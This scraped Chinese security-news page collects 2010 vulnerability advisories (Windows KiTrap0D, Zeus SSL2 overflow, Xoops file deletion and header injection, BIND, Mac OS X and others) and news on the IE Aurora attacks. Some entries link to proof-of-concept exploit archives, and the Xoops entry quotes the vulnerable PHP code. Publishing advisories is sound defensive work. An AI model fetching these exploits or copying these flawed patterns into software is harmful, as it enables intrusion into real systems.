尽管利用这个漏洞无需用户认证，但必须要完成TCP三重握手，且必须出现一些SSH协议协商。SSH服务在攻击后仍可继续正常运行。 <*来源：Cisco安全公告     链接：http://www.cisco.com/warp/public/707/cisco-sa-20100120-xr-ssh.shtml *> 建议：厂商补丁： Cisco ----- Cisco已经为此发布了一个安全公告（cisco-sa-20100120-xr-ssh）以及相应补丁: cisco-sa-20100120-xr-ssh：Cisco IOS XR Software SSH Denial of Service Vulnerability 链接：http://www.cisco.com/warp/public/707/cisco-sa-20100120-xr-ssh.shtml Cisco,IOS,XR,SSH协议,远程,拒绝服务,漏洞 漏洞公告 admin 绿盟科技 2010-01-22 10:21 http://www.serversteam.com/S/Vuln/vuln_617.html 受影响系统： Adobe Shockwave Player 11.5.2.602 不受影响系统： Adobe Shockwave Player 11.5.2.606 描述：BUGTRAQ ID: 37870,37872 CVE ID: CVE-2009-4002,CVE-2009-4003 Adobe Shockwave Player是专门播放使用Director Shockwave Studio制作 受影响系统：     Adobe Shockwave Player 11.5.2.602 不受影响系统：     Adobe Shockwave Player 11.5.2.606 描述：BUGTRAQ  ID: 37870,37872 CVE ID: CVE-2009-4002,CVE-2009-4003 Adobe Shockwave Player是专门播放使用Director Shockwave Studio制作的网页的外挂软件。 Shockwave Player在处理Shockwave 3D模型时存在堆溢出漏洞，在处理各种块类型时存在多个整数溢出漏洞。用户受骗访问了恶意网页就可以触发这些溢出，导致执行任意代码。 <*来源：Alin Rad Pop     链接：http://secunia.com/secunia_research/2009-61/         http://secunia.com/secunia_research/2009-62/         http://secunia.com/secunia_research/2009-63/         http://secunia.com/secunia_research/2010-1/         http://www.adobe.com/support/security/bulletins/apsb10-03.html *> 建议：厂商补丁： Adobe ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://get.adobe.com/shockwave/ Adobe,Shockwave,Player,模型,解析,溢 漏洞公告 admin 绿盟科技 2010-01-22 10:12 http://www.serversteam.com/S/Vuln/vuln_616.html 受影响系统： Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Microsoft Windows Server 2008 SP2 Microsoft Windows Server 2008 Microsoft Windows 7 Microsoft Windows 受影响系统：     Microsoft Windows XP SP3     Microsoft Windows XP SP2     Microsoft Windows Vista SP2     Microsoft Windows Vista SP1     Microsoft Windows Vista     Microsoft Windows Server 2008 SP2     Microsoft Windows Server 2008     Microsoft Windows 7     Microsoft Windows 2000SP4 描述：BUGTRAQ  ID: 37864 CVE ID: CVE-2010-0232 Microsoft Windows是微软发布的非常流行的操作系统。 Windows的内核#GP陷井处理例程对执行的环境做了一些不正确的假设，本地普通用户权限的攻击者可以通过伪造执行环境中的数据使操作系统在ring0层执行指定的任意指令，从而取得对系统的完全控制。此漏洞影响几乎所有的x86 32位的Windows系统。 为了在老式的16位应用中支持BIOS服务例程，Windows NT内核支持Virtual-8086模式监控代码中的BIOS调用，分两个阶段实现。当#GP陷阱处理器（nt!KiTrap0D）检测到出错的 cs:eip匹配了特定的magic value，内核就会过渡到第二阶段。一旦确认了真实性，过渡到第二阶段就会涉及到从出错的陷阱帧恢复之前所保存的执行上下文和调用栈。 由于这个验证依赖于以下错误的假设：   - 创建VDM上下文需要SeTcbPrivilege   - ring3代码无法安装任意代码段选择器   - ring3代码无法伪造陷阱帧 本地攻击者可以创建伪造的VDM上下文，然后通过触发异常导致内核栈返回到受控的地址，导致执行任意内核态代码。 <*来源：Tavis Ormandy （taviso@gentoo.org）     链接：http://secunia.com/advisories/38265/         http://www.microsoft.com/technet/security/advisory/979682.mspx?pf=true         http://marc.info/?l=full-disclosure&m=126392889822726&w=2 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip 建议：临时解决方法： 如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁： * 禁用NTVDM子系统。   1. 运行 gpedit.msc 程序   2. 展开“管理模板”，选择“Windows组件”   3. 点击“应用程序兼容性”   4. 在右边的条目显示框内双击“防止访问16位应用程序”   5. 设置标签页中选择“已启用”   6. 点击“确定” 厂商补丁： Microsoft --------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.microsoft.com/technet/security/advisory/979682.mspx Microsoft,Windows,处理器,权限,提升,漏洞 漏洞公告 admin 绿盟科技 2010-01-22 10:10 http://www.serversteam.com/S/News/news-20100121615.html 1月20日据悉，上周五被确认的微软IE极光漏洞攻击代码已被黑客大面积利用，网上已出现数百个利用该漏洞的恶意网页，提醒广大电脑用户谨防遭受利用该漏洞的病毒攻击。 上周，微软官方发 1月20日据悉，上周五被确认的微软IE“极光漏洞”攻击代码已被黑客大面积利用，网上已出现数百个利用该漏洞的恶意网页，提醒广大电脑用户谨防遭受利用该漏洞的病毒攻击。 上周，微软官方发布了Microsoft Security Advisory (979352)安全公告，确认在IE6/7/8版本中，存在零日漏洞，涉及的操作系统包括：Windows 2000 SP4, Windows XP/2003/Vista/2008，Windows 7。微软在安全公告中表示，IE在特定情况下，有可能访问已经被释放的内存对象导致任意代码执行，该漏洞可以被用来进行网页挂马。该漏洞即后来被称为 “Aurora”（极光）的零日漏洞。 安全专家表示，由于该漏洞涉及的操作系统和IE浏览器版本众多，而且至今微软并没有发布针对该漏洞的补丁，因此一旦攻击代码被公开，必将被黑客广泛应用于网页挂马。截止到1月20日，不到两天的时间内，网上出现了数百个利用该漏洞的恶意网页，保守估计至少十万台电脑遭受利用该漏洞的病毒攻击。 安全专家提醒用户，上网浏览时务必不要随意点击网上的不明链接，开启杀毒软件主动防御和网页监控功能。对操作系统较熟悉的用户，可以参照微软的临时解决方案，以进一步保障电脑上网安全。此外，微软最新消息表示，将于明日（1月21日）公布发布紧急补丁时间表，请广大电脑用户密切关注该补丁并及时下载安装。 微软临时解决方案： WINXP（IE6）用户，打开IE浏览器“工具”——“Internet选项”，打开“安全”，选择“Internet”——“自定义级别”，选择“禁止脚本”和“禁止ACTIVEX选项”，VISTA（IE7）和 WINDOWS7（IE8）用户，除了执行以上操作外，还可以开启数据执行保护功能（DEP保护），可以一定程度上减少系统遭受“极光”漏洞病毒攻击。 极光,漏洞,黑客,利用,恶意 行业资讯 Barry 赛迪网 2010-01-21 14:14 http://www.serversteam.com/S/News/news-20100121614.html 最近，一位专家做了一项VoIP实验，实验表明现在企业用的VoIP对于网络黑客来说，是多么容易轻松盗取信息。利用SIPtap这种软件，可轻松监控多条VoIP线路，该软件可轻松监听和记录远程.wav文件 最近，一位专家做了一项VoIP实验，实验表明现在企业用的VoIP对于网络黑客来说，是多么容易轻松盗取信息。利用SIPtap这种软件，可轻松监控多条VoIP线路，该软件可轻松监听和记录远程.wav文件。而黑客唯一需要做的就是，让一个特洛伊木马病毒侵入到公司网络的一台PC中就可以。     这个测试实验是从今年8月份开始的，并且持续到现在。利用SIPtap软件可以获取任何需要的信息。SIPtap实验充分表明：VoIP致命弱点就是安全性，黑客可以窃取私密数据、政府文件、甚至公安机关的文件。     实验是由VoIP专家Peter Cox测试，Cox曾经是BorderWare防火墙厂商的合伙人和CTO。现在他建立了一家VoIP咨询实施公司。之所以做这个测试，是在和安全专家 Phil Zimmermann聊天后进行的，Zimmermann是Zfone的创始人。此次实验目的为了证明VoIP的网络危险性。 专家,实验,VoIP,不安全,黑客,盗取,数据 行业资讯 admin 服安资讯 2010-01-21 14:12 http://www.serversteam.com/S/News/news-20100121613.html 金山安全实验室19日发布2010年首个高危安全预警，曾被黑客利用攻击Google、Yahoo等多家知名互联网公司的IE极光0day漏洞已经被黑客广泛利用，被挂马的网站数量飙升，将对普通网民产生极大威胁 金山安全实验室19日发布2010年首个高危安全预警，曾被黑客利用攻击Google、Yahoo等多家知名互联网公司的IE极光0day漏洞已经被黑客广泛利用，被挂马的网站数量飙升，将对普通网民产生极大威胁。专家估计，按照目前的挂马网站增长趋势估计，本周将全面爆发。 金山安全专家李铁军说，自上周以来，挂马集团已经开始部署利用IE极光0day漏洞。自该漏洞被黑客公布以后，金山网盾拦截利用该漏洞的木马攻击次数以每天36.3%的速度增长，日拦截攻击行为42.8万余次，共拦截数百万次通过IE极光0day漏洞进行的攻击。 金山网盾截获的网站以色情网站为主，也有下载类网站及其他类型网站。 李铁军分析，由于目前IE极光0day漏洞主要利用色情网站进行挂马，此类网站日流量通常以百万计算，而该漏洞主要针对IE浏览器(该浏览器市场占有率50.8%)，实际潜在受影响用户保守估计应在千万级。 专家建议，在微软正式发布该漏洞补丁之前，不要轻易使用第三方公司提供的漏洞补丁。部分网页防挂马产品使用的下载拦截可能导致浏览器崩溃不能正常工作。 攻击,Google,Yahoo,Oday,漏洞,黑客,利用 行业资讯 admin 未知 2010-01-21 14:11 http://www.serversteam.com/S/News/news-20100121612.html 市民张先生：准备在游易旅行网购买便宜机票，但是根本不能进行查询和预订，而总是有一些不法代理商的黑客广告阻挠。 记者出动： 易网通的工作人员说的确有市民投诉称，阻止他们登陆网 市民张先生：准备在游易旅行网购买便宜机票，但是根本不能进行查询和预订，而总是有一些不法代理商的‘黑客’广告阻挠。 记者出动： 易网通的工作人员说“的确有市民投诉称，阻止他们登陆网站和查询，还被强迫进入这些黑客的网站，还有一些山寨的网站，用游易的名称。目前长沙、成都、武汉等地都已经派人去处理，北京、上海、广州、深圳正在调查中”。 游易旅行网市场总监王一力对受到困扰的消费者深表歉意，表示游易工作人员已经着手处理此事，游易旅行网将会对此事追查到底。目前请订票旅客及时清理电脑中的流氓软件。 黑客,广告,干扰,订机票 行业资讯 admin 信息时报 2010-01-21 14:08 http://www.serversteam.com/S/News/news-20100121611.html 1月20日讯(记者 蒋亮) 内地每年新出现的百万名黑客大部分流向了社会，与此同时网上攻击的频繁和网上交易的开放则成为矛盾！1月20日，在谈到信息安全问题时甲骨文企业身份 管理产品总监刘 1月20日讯(记者 蒋亮) “内地每年新出现的百万名黑客大部分流向了社会，与此同时网上攻击的频繁和网上交易的开放则成为矛盾！”1月20日，在谈到信息安全问题时甲骨文企业身份 管理产品总监刘安峰指出，随着击键记录器、木马、恶意软件、网络钓鱼和域欺骗等网络攻击手段的花样翻新，企业信息资产的安全显得越来越突出。 甲骨文企业身份管理产品总监刘安峰谈信息安全 　　业内人士指出， 黑客这种仿佛生活在另外一个神秘世界的人物其实已经渗透到了普通网民和企业网络世界的每个部分，“随着每年翻倍的数据增长速度，从2005年至2008年 数据侵犯增长高达630%。”刘安峰总监透露说，过去通常的防范手段是将访问者挡在门外，如今做到这点远远不够，因为企业的信息产业架构需要向客户和员工 开放，“这意味着你必须将访问者放进防火墙，但又要保证企业的信息资产绝对安全。” 　　一份去年的信息安全性调查报告结果显示，如今90%以上企业认为安全性最重要的是自己的数据安全，其次是占比86%的应用安全性。“为了确保访 问者就是指定访问者，光凭用户名和密码显然已经不能适应安全需要！”刘安峰总监介绍说，事实上，对于安全性的确认已经到了非常综合性的地步，“就连访问者 敲击键盘的速度都成为了属性之一，因为每个人敲击键盘的速度和习惯都有细微差别，而黑客显然敲击键盘的速度很快！” 　　就如何保护企业内部的信息安全，刘安峰介绍了甲骨文最新研发的先进数据库纵深防御体系，“我们提供的一系列数据库安全产品能够在数据加密和屏蔽 基础上实行访问控制，并实时监控整个数据环境里的活动，从而实现立体化的数据保护。”刘安峰表示，该安全解决方案可保护数据隐私，防范内部威胁并确保遵守 法规，“这样一来，用户无需改变应用程序即可部署可靠且经济有效的解决方案。” http://www.serversteam.com/uploads/allimg/100121/140J92M3-0-lp.jpg 中国,诞生,百万,黑客,信息安全 行业资讯 admin 四川新闻网成都 2010-01-21 14:06 http://www.serversteam.com/S/News/news-20100121610.html 娄底市公安局网技支队近日破获一起非法侵入计算机案件，并通过层层追击，成功摧毁了一条黑客产业链。 今年以来，不断有群众向娄底市公安局网技支队报案称：其电脑遭到木马入侵，游戏 娄底市公安局网技支队近日破获一起非法侵入计算机案件，并通过层层追击，成功摧毁了一条“黑客产业链”。 今年以来，不断有群众向娄底市公安局网技支队报案称：其电脑遭到木马入侵，游戏角色的装备不翼而飞，有些游戏装备还是花费数万元购买来的。警方介入侦查，在今年10月 28日取得重大突破，将在互联网上挂马盗账号的嫌疑人李某成功抓获，并通过深挖，远赴福建，将福建某大学学生黄某（木马提供者）抓获。 经查证，犯罪嫌疑人李某通过购买黄某的“剑侠世界”和“完美世界国际”两款木马程序，模仿正版“剑侠娃娃”和“完美金箍棒”网站自建了两个网站，然后将购买来的游戏木马程序分别捆绑到下载软件内，当游戏玩家点击下载该网站软件时，电脑就会中木马，游戏玩家的账号密码等信息就会被盗取。李某通过盗号盗取他人游戏装备，然后将游戏装备放到5173网站上出售。同时，李某也将盗取来的账号信息卖给下家刘某，再由刘某盗取装备转卖。 这样，从购买木马程序到挂马盗号，再到盗取装备贩卖，一个黑客产业链条就形成了。黄某在不到一年的时间里，贩卖了大量的木马程序给数以百计的像李某这样的挂马者，获利近百万元。 目前，黄某因涉嫌提供非法侵入或者控制计算机信息系统专用程序、工具罪被娄底市人民检察院批准逮捕，李某、刘某因涉嫌非法获取计算机信息系统数据罪被取保候审。目前，该案还在进一步的深挖之中。 大学生,黑客,挂马,盗装备,牟利,被抓 行业资讯 admin IT人 2010-01-21 14:05 http://www.serversteam.com/S/News/news-20100121609.html 在新一代的客户端操作系统Win7中，微软向用户提供了移除IE8的选项，但是究竟有几个用户使用这项功能的呢? 经过调查显示，在现实生活中，很少会有用户会自主选择Windows 7中的移除IE选项。在 在新一代的客户端操作系统Win7中，微软向用户提供了“移除IE8”的选项，但是究竟有几个用户使用这项功能的呢? 　　经过调查显示，在现实生活中，很少会有用户会自主选择Windows 7中的“移除IE”选项。在大多数情况下，即使用户选择使用其他的浏览器，诸如Mozilla火狐、谷歌Chrome、Opera等，但是却不会花费时间去卸载IE浏览器。 　　近段时间，IE浏览器中消极的安全性引起了众人的注目。有报道称，谷歌网站和Adobe软件中所受到的轮番攻击很有可能是于IE中的漏洞有关。 　　据了解，目前，McAfee已经向微软通报了此漏洞，预计不久微软将提供相关建议。McAfee指出，这些攻击看起来像是来自一个信任的来源，诱使目标点击一个链接或文件，从而掉入攻击者的陷阱，利用的是微软IE中的漏洞。 　　此外，有人大肆放风说：Adobe的软件之所以会遭受轮番的攻击，也是因为IE中的漏洞(此处纯瞎掰了)。 　　   　　同行“好意的”发表声明说：如果微软不抓紧修复IE中的漏洞的话，那么Win7中内置的IE8移除功能很有可能会派上用场。 　　可是，当你卸载了IE，你会尴尬的发现，很多IE内核的浏览器等都无法上网了 ：) http://www.serversteam.com/uploads/allimg/100121/1405222932-0-lp.jpg Windows7,卸载,IE8,浏览器,黑客,攻击 行业资讯 admin 未知 2010-01-21 14:03 http://www.serversteam.com/S/Vuln/vuln_608.html 受影响系统： OpenOffice OpenOffice 3.1.1 OpenOffice OpenOffice 3.1.0 描述：BUGTRAQ ID: 37857 OpenOffice是个整合性的软件，包含了许多文字处理、表格、公式等办公工具。 用户受骗使用Openoffice打开了畸形的. 受影响系统：     OpenOffice OpenOffice 3.1.1     OpenOffice OpenOffice 3.1.0 描述：BUGTRAQ  ID: 37857 OpenOffice是个整合性的软件，包含了许多文字处理、表格、公式等办公工具。 用户受骗使用Openoffice打开了畸形的.slk文件就可以触发空指针引用，导致soffice.bin崩溃。 <*来源：karak0rsan （karakorsankara@hotmail.com）     链接：http://marc.info/?l=bugtraq&m=126391939406783&w=2 *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://tcc.hellcode.net/sploitz/slk.rar 建议：厂商补丁： OpenOffice ---------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.openoffice.org/ OpenOffice .slk,文件,解析,指针,拒绝服务, 漏洞公告 admin 绿盟科技 2010-01-21 13:57 http://www.serversteam.com/S/Vuln/vuln_607.html 受影响系统： Zeus Technologies Zeus Web Server 4.x 不受影响系统： Zeus Technologies Zeus Web Server 4.3 r5 描述：BUGTRAQ ID: 37829 ZEUS是一款开放源代码的WEB服务程序，包含基于WEB的管理接口。 远程攻击者可以通 受影响系统：     Zeus Technologies Zeus Web Server 4.x 不受影响系统：     Zeus Technologies Zeus Web Server 4.3 r5 描述：BUGTRAQ  ID: 37829 ZEUS是一款开放源代码的WEB服务程序，包含基于WEB的管理接口。 远程攻击者可以通过向Zeus服务器发送特制的SSL2_CLIENT_HELLO报文触发缓冲区溢出，导致执行任意指令。 <*来源：Evgeny Legerov （aland@freeradius.org）     链接：http://secunia.com/advisories/38056/ *> 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ http://intevydis.blogspot.com/2010/01/zeus-web-server-ssl2clienthello.html 建议：厂商补丁： Zeus Technologies ----------------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://support.zeus.com/zws/media/docs/4.3/RELEASE_NOTES Zeus,Web,Server,SSL2_CLIENT_HE 漏洞公告 admin 绿盟科技 2010-01-21 13:56 http://www.serversteam.com/S/Vuln/vuln_606.html 受影响系统： Xoops Xoops 2.4.3 描述：BUGTRAQ ID: 37860 Xoops是非常流行的动态web内容管理系统，用面向对象的PHP编写。 Xoops使用了unlink函数来删除Web服务器中的文件。由于对用户输入使用了这个函数 受影响系统：     Xoops Xoops 2.4.3 描述：BUGTRAQ  ID: 37860 Xoops是非常流行的动态web内容管理系统，用面向对象的PHP编写。 Xoops使用了unlink函数来删除Web服务器中的文件。由于对用户输入使用了这个函数：         unlink($oldsmile_path); 尽管使用了str_replace等过滤功能：         $oldsmile_path = str_replace("\\", "/", \ realpath(XOOPS_UPLOAD_PATH.'/'.trim($_POST['old_smile']))); 这种过滤仍不够强壮，用户可以通过提交恶意请求删除指定的文件。 Xoops没有执行任何过滤或限制便使用了用户输入中的$redirect变量：         $redirect = trim($_GET['xoops_redirect']); 以及：         header('Location: ' . $redirect); 用户可以在请求头中注入恶意代码，之后再次访问页面时就会执行注入的代码。 <*来源：CodeScan Labs （advisories@codescan.com）     链接：http://marc.info/?l=bugtraq&m=126392239411722&w=2 *> 建议：厂商补丁： Xoops ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://xoops.sourceforge.net/   XOOPS,删除,HTTP头,注入,漏洞 漏洞公告 admin 绿盟科技 2010-01-21 13:56 http://www.serversteam.com/S/Vuln/vuln_605.html 受影响系统： Apple Mac OS X 10.6.2 Apple Mac OS X 10.5.8 Apple MacOS X Server 10.6.2 Apple MacOS X Server 10.5.8 描述：BUGTRAQ ID: 37868 CVE(CAN) ID: CVE-2010-0036 Mac OS X是苹果家族机器所使用的操作系统。 Mac OS X的CoreAudio驱 受影响系统：     Apple Mac OS X 10.6.2     Apple Mac OS X 10.5.8     Apple MacOS X Server 10.6.2     Apple MacOS X Server 10.5.8 描述：BUGTRAQ  ID: 37868 CVE(CAN) ID: CVE-2010-0036 Mac OS X是苹果家族机器所使用的操作系统。 Mac OS X的CoreAudio驱动在解析mp4音频文件时存在缓冲区溢出，用户受骗打开恶意的mp4文件就可以导致拒绝服务或执行任意指令。 <*来源：Tobias Klein     链接：http://support.apple.com/kb/HT4004         http://secunia.com/advisories/38241/ *> 建议：厂商补丁： Apple ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://support.apple.com/downloads/DL993/en_US/SecUpd2010-001.dmg http://support.apple.com/downloads/DL992/en_US/SecUpdSrvr2010-001.dmg Apple,MacOS,CoreAudio,MP4,缓冲区, 漏洞公告 admin 绿盟科技 2010-01-21 13:55 http://www.serversteam.com/S/Vuln/vuln_604.html 受影响系统： Apple Mac OS X 10.6.2 Apple Mac OS X 10.5.8 Apple MacOS X Server 10.6.2 Apple MacOS X Server 10.5.8 描述：BUGTRAQ ID: 37869 CVE(CAN) ID: CVE-2010-0037 Mac OS X是苹果家族机器所使用的操作系统。 Mac OS X的Image RAW解 受影响系统：     Apple Mac OS X 10.6.2     Apple Mac OS X 10.5.8     Apple MacOS X Server 10.6.2     Apple MacOS X Server 10.5.8 描述：BUGTRAQ  ID: 37869 CVE(CAN) ID: CVE-2010-0037 Mac OS X是苹果家族机器所使用的操作系统。 Mac OS X的Image RAW解码器在处理DNG文件时存在缓冲区溢出，用户受骗打开恶意的DNG图形就可以导致拒绝服务或执行任意指令。 <*来源：Jason Carr     链接：http://support.apple.com/kb/HT4004         http://secunia.com/advisories/38241/ *> 建议：厂商补丁： Apple ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://support.apple.com/downloads/DL994/en_US/SecUpd2010-001Snow.dmg http://support.apple.com/downloads/DL993/en_US/SecUpd2010-001.dmg http://support.apple.com/downloads/DL992/en_US/SecUpdSrvr2010-001.dmg   Mac,RAW,解码器,DNG,缓冲区,溢出 漏洞公告 admin 绿盟科技 2010-01-21 13:54 http://www.serversteam.com/S/Vuln/vuln_603.html 受影响系统： ISC BIND 9.6.x ISC BIND 9.5.x ISC BIND 9.4.x ISC BIND 9.3.x ISC BIND 9.2.x ISC BIND 9.1.x ISC BIND 9.0.x 不受影响系统： ISC BIND 9.6.1-P3 ISC BIND 9.5.2-P2 ISC BIND 9.4.3-P5 描述：BUGTRAQ ID: 37865 CVE(CAN) ID: CVE-2010-0 受影响系统：     ISC BIND 9.6.x     ISC BIND 9.5.x     ISC BIND 9.4.x     ISC BIND 9.3.x     ISC BIND 9.2.x     ISC BIND 9.1.x     ISC BIND 9.0.x 不受影响系统：     ISC BIND 9.6.1-P3     ISC BIND 9.5.2-P2     ISC BIND 9.4.3-P5 描述：BUGTRAQ  ID: 37865 CVE(CAN) ID: CVE-2010-0097 BIND是一个应用非常广泛的DNS协议的实现，由ISC负责维护，具体的开发由Nominum公司完成。 BIND 9的DNSSEC验证代码中的安全漏洞可能允许攻击者生成伪造的NXDOMAIN响应，而向解析器缓存中添加了伪造的NXDOMAIN记录会导致之后的查询都会返回设置了AD标志的伪造NXDOMAIN，这是一种缓存中毒的情况。 DNS缓存中毒指的是更改了DNS服务器的DNS缓存中某项，这样缓存中与主机名相关的IP地址就不再指向正确的位置。例如，如果 www.example.com映射到IP地址192.168.0.1且DNS服务器的缓存中存在这个映射，则成功向这个服务器的DNS缓存投毒的攻击者就可以将www.example.com映射到10.0.0.1。在这种情况下，试图访问www.example.com的用户就可能与错误的Web服务器联络。 由于所实施的缓存中毒防护措施，这个漏洞较难利用，但会影响DNSSEC对安全区中拒绝服务攻击的防护。 <*来源：ISC     链接：https://www.isc.org/advisories/CVE-2010-0097         http://www.kb.cert.org/vuls/id/360341 *> 建议：厂商补丁： ISC --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： ftp://ftp.isc.org/isc/bind9/9.5.1-P2/bind-9.5.1-P2.tar.gz ftp://ftp.isc.org/isc/bind9/9.4.3-P5/bind-9.4.3-P5.tar.gz ftp://ftp.isc.org/isc/bind9/9.6.1-P3/bind-9.6.1-P3.tar.gz BIND,DNSSEC,伪造,NXDOMAIN,缓存,投毒 漏洞公告 admin 绿盟科技 2010-01-21 13:52 http://www.serversteam.com/S/Vuln/vuln_602.html 受影响系统： LibThai LibThai 0.1.13 不受影响系统： LibThai LibThai 0.1.13 描述：BUGTRAQ ID: 37822 CVE(CAN) ID: CVE-2009-4012 LibThai是LINUX系统中使用的泰语支持库。 LibThai库的thbrk/thbrk.c和thwbrk/thwbrk.c文件中存在 受影响系统：     LibThai LibThai < 0.1.13 不受影响系统：     LibThai LibThai 0.1.13 描述：BUGTRAQ  ID: 37822 CVE(CAN) ID: CVE-2009-4012 LibThai是LINUX系统中使用的泰语支持库。 LibThai库的thbrk/thbrk.c和thwbrk/thwbrk.c文件中存在最终可导致堆溢出的整数溢出漏洞。用户受骗使用链接到该库的应用处理了超长字符串就可以触发这个溢出，导致执行任意指令。 <*来源：Tim Starling     链接：http://secunia.com/advisories/38196         http://www.debian.org/security/2010/dsa-1971 *> 建议：厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1971-1）以及相应补丁: DSA-1971-1：New libthai packages fix arbitrary code execution 链接：http://www.debian.org/security/2010/dsa-1971 补丁下载： Source archives: http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.6-1+etch1.dsc Size/MD5 checksum:      683 c43a718e2d05c2b47af4bac86903e896 http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.6.orig.tar.gz Size/MD5 checksum:   847074 f085d66dc46c166c278c252898035076 http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.6-1+etch1.diff.gz Size/MD5 checksum:    11695 71127f5e7afcdcbfd5af6780505c7a1a Architecture independent packages: http://security.debian.org/pool/updates/main/libt/libthai/libthai-doc_0.1.6-1+etch1_all.deb Size/MD5 checksum:    50312 317992ee889c0de0fe9dc9ea97a57fc6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_alpha.deb Size/MD5 checksum:   275028 428557ab4a790fc85b0733d1b28dc801 http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_alpha.deb Size/MD5 checksum:   316330 ffc67c38acf68cd77c8f6a236de187c1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_amd64.deb Size/MD5 checksum:   275070 aac7f0edfc5b53640626dd7843e9bf1f http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_amd64.deb Size/MD5 checksum:   311134 2f471ee3c58d737ddc9b5f298b45476e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_hppa.deb Size/MD5 checksum:   376960 a42594c08a9e2dc461bf6d41b1ffa843 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_hppa.deb Size/MD5 checksum:   339122 97710ae2e6a4110fed1d708e5480f718 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_i386.deb Size/MD5 checksum:   273352 8500dbe477de0cd29299ba211a45f7ae http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_i386.deb Size/MD5 checksum:   313540 1e7854db6cef8b1e2b9bf5065e62bcd4 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_ia64.deb Size/MD5 checksum:   319442 092a822857a37961e6796773c033d3a8 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_ia64.deb Size/MD5 checksum:   278182 c225f2e441ea5e2aa4b8aadcb928cd38 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_mips.deb Size/MD5 checksum:   376754 467ff44afe323bae6c3dbb988da7e089 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_mips.deb Size/MD5 checksum:   337592 1dabc2d5d7ad3baedcec607bffc4a55a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_mipsel.deb Size/MD5 checksum:   314592 fa20d463d069f95cda9638a3113fcd51 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_mipsel.deb Size/MD5 checksum:   274038 1e210dff44b35d320903c915a07bf4f7 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_powerpc.deb Size/MD5 checksum:   376180 4eaf094301d96f7db8823986275c1336 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_powerpc.deb Size/MD5 checksum:   338226 ac8eb480c5f790cd9e6c9bdf6837027c s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_s390.deb Size/MD5 checksum:   338280 c2ca43fc46bf76c10e580b5b021ce5f7 http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_s390.deb Size/MD5 checksum:   377418 ea0936d056392d9aef116c3ebdcdb1b3 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.6-1+etch1_sparc.deb Size/MD5 checksum:   374490 40b15de3062e64a1528f188d6b10a646 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.6-1+etch1_sparc.deb Size/MD5 checksum:   336808 124b46ae02cd1d558dac1123f93ed72c Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.9.orig.tar.gz Size/MD5 checksum:   491038 7002d111b293f202d20b28aa2b4ed68f http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.9-4+lenny1.dsc Size/MD5 checksum:     1385 f3ff74195cf9278c2c24afa71ab1edd1 http://security.debian.org/pool/updates/main/libt/libthai/libthai_0.1.9-4+lenny1.diff.gz Size/MD5 checksum:     7558 0ec2e54ed7c29f95b5bd1ae0f5db254e Architecture independent packages: http://security.debian.org/pool/updates/main/libt/libthai/libthai-doc_0.1.9-4+lenny1_all.deb Size/MD5 checksum:    59400 d1d8ca56379e789fa40035dc9438a202 http://security.debian.org/pool/updates/main/libt/libthai/libthai-data_0.1.9-4+lenny1_all.deb Size/MD5 checksum:   163256 62556f11ed47bdf3f0c0844a29b0f7a3 alpha architecture (DEC Alpha) 